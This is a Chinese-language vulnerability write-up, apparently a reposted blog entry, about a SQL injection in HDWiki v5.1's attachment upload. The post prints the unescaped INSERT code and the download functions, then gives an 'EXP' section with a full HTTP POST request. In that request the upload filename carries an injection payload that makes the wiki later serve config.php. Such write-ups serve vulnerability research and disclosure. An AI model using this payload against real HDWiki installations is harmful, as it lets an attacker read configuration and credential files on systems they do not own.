hdwiki v5.1存在SQL注入导致可下载任意文件

2019独角兽企业重金招聘Python工程师标准>>>

1、hdwiki的运行模式

每到来一个请求，请求index.php，index.php使用请求中的querystring，querystring的形式是class-mothod的形式，去加载controller。本案中加载的attachment.php这个controller，controller的构造函数调用了attachment的model，最后把这个model放到$_ENV变量中

加载完毕controller之后，index.php中的程序会使用method的值，去调用controller 中的函数，本案中调用的是attachment的uploadimg和download

2、漏洞位置

漏洞存在于model/attachment.class.php，出现该漏洞是下图所示的注释内容不存在导致了注入

	function add_attachment($uid,$did,$filename,$attachment,$description,$filetype='.jpg',$isimage=1,$coindown=0){
		$filesize=filesize($attachment);
		#$filename=string::haddslashes($filename);
		if(empty($coindown) || !is_numeric($coindown)) {
			$coindown = 0;
		}
		$this->db->query("INSERT INTO ".DB_TABLEPRE."attachment(did,time,filename,description,filetype,filesize,attachment,coindown,isimage,uid) VALUES ($did,{$this->base->time},'$filename','$description','$filetype','$filesize','$attachment',$coindown,$isimage,$uid)");
		return $this->db->insert_id();
	}

 

当该段代码存在漏洞时，从客户端获得的$filename变量没有经过addslashes进行转义直接放入了insert语句中，此时可以闭合insert语句，在下载的位置插入你想下载的文件名称，比如config.php

下载的代码如下

	function dodownload(){
		if(!isset($this->get[2]) || !is_numeric($this->get[2])){
			$this->message($this->view->lang['parameterError'],'BACK');
		}
		$result=$_ENV['attachment']->get_attachment('id',$this->get[2],0);
		if(!(bool)$attachment=$result[0]){
			$this->message($this->view->lang['attachIsNotExist'],'BACK');
		}
		if($this->user['uid'] != $attachment['uid']) {
			// 判断金币
			$credit1 = $this->user['credit1'];		// 拥有金币数
			$coindown = $attachment['coindown'];	// 下载此附件需要消耗金币数
			if(0 > $credit1 - $coindown) {
				// 金币不足
				$this->message($this->view->lang['goldNotEnough'],"index.php?doc-view-".$attachment['did'],0);
			}
			// 扣除金币
			$_ENV['user']->add_credit($this->user['uid'],'attachment-down',0,-$coindown);
			// 增加金币
			$_ENV['user']->add_credit($attachment['uid'],'attachment-down',0,$coindown);
		}
		$_ENV['attachment']->update_downloads($attachment['id']);
		file::downloadfile($attachment['attachment'],$attachment['filename']);
	}

 

	function downloadfile($filepath,$filename=''){
		if(!file_exists($filepath)){
			return 1;
		}
		if(''==$filename){
			$tem=explode('/',$filepath);
			$num=count($tem)-1;
			$filename=$tem[$num];
			$filetype=substr($filepath,strrpos($filepath,".")+1);
		}else{
			$filetype=substr($filename,strrpos($filename,".")+1);
		}
		$filename_utf=function_exists(mb_convert_encoding)?mb_convert_encoding($filename, "gbk",'utf-8'):urldecode($filename);
		$filename ='"'.(strtolower(WIKI_CHARSET) == 'utf-8' && !(strpos($_SERVER['HTTP_USER_AGENT'], 'MSIE') === FALSE) ? $filename_utf : $filename).'"';
		$filesize = filesize($filepath);
		$dateline=time();
		file::hheader('date: '.gmdate('d, d m y h:i:s', $dateline).' gmt');
		file::hheader('last-modified: '.gmdate('d, d m y h:i:s', $dateline).' gmt');
		file::hheader('content-encoding: none');
		file::hheader('content-disposition: attachment; filename='.$filename);
		file::hheader('content-type: '.$filetype);
		file::hheader('content-length: '.$filesize);
		file::hheader('accept-ranges: bytes');
		if(!@empty($_SERVER['HTTP_RANGE'])) {
			list($range) = explode('-',(str_replace('bytes=', '', $_SERVER['HTTP_RANGE'])));
			$rangesize = ($filesize - $range) > 0 ?  ($filesize - $range) : 0;
			file::hheader('content-length: '.$rangesize);
			file::hheader('http/1.1 206 partial content');
			file::hheader('content-range: bytes='.$range.'-'.($filesize-1).'/'.($filesize));
		}
		if($fp = @fopen($filepath, 'rb')) {
			@fseek($fp, $range);
			echo fread($fp, filesize($filepath));
		}
		fclose($fp);
		flush();
		ob_flush();
	}

 

下载调用attachment-download-xx，其中xx是附件的ID。

如果插入的时候说的下载的文件是config.php，这里就会下载config.php

3、后记

insert语句的注入接触得比较少。

 

4、EXP

POST /HDWiki-v5.1UTF8-20121102/hdwiki/index.php?attachment-uploadimg-56 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://localhost/HDWiki-v5.1UTF8-20121102/hdwiki/index.php?doc-create
Cookie: hd_sid=Bt0yO7; hd_auth=c701xbewwRttXTWmEfTitYLArcr4zMn0TGPnyic7X88rXCWcRggNb%2Bdl2EVozEComqD40qfHev4M0ZgOylZ3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------106771681822525
Content-Length: 37933

-----------------------------106771681822525
Content-Disposition: form-data; name="photofile"; filename="upload','hehe','gif','10000','config.php',0,1,2)#.gif"
Content-Type: image/png

上传文件的过程将filename改成图中的exp既可。

转载于:https://my.oschina.net/u/812640/blog/1620432